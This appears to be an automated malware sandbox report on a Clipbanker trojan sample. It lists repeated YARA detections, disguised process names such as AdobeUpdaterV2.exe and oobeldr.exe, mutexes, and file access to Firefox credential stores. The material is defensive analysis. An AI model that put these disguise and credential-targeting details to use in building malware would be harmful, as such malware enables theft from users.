Source: 20.2.RthubJXJJOhKyKgs0z_b.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 33.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 33.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 21.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 21.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 30.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 30.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 8.2.IHobmyUUXF8jFZ9HHCK7.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 8.2.IHobmyUUXF8jFZ9HHCK7.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 41.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 41.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 44.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 44.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 12.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 12.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000015.00000002.1654590911.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000015.00000002.1654590911.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000008.00000002.1568547608.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000008.00000002.1568547608.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000029.00000002.1986808153.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000029.00000002.1986808153.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000026.00000002.1907034183.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000026.00000002.1907034183.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000016.00000002.1653499972.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000016.00000002.1653499972.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001E.00000002.1731319908.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001E.00000002.1731319908.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000014.00000002.1638452398.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000014.00000002.1638452398.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000002C.00000002.3795988174.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000002C.00000002.3795988174.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000C.00000002.1586960616.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000C.00000002.1586960616.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000B.00000002.1585774146.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000B.00000002.1585774146.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000019.00000002.1649208169.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000019.00000002.1649208169.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000021.00000002.1812078816.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000021.00000002.1812078816.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000D.00000002.1585794053.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000D.00000002.1585794053.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@59/36@3/5
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\signons.sqlite Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_03
Source: C:\Users\user\Desktop\file.exe Mutant created: \Sessions\1\BaseNamedObjects\slickSlideAnd2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4128:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3800:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1984:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2464:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3984:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1996:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3700:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6552:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Mutant created: \Sessions\1\BaseNamedObjects\jW5fQ5e-C7lR7tC1q
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:908:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5208:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4452:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4584:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\trixy8fTqI7Z4TQTK Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000002.3798251494.00000000006BA000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
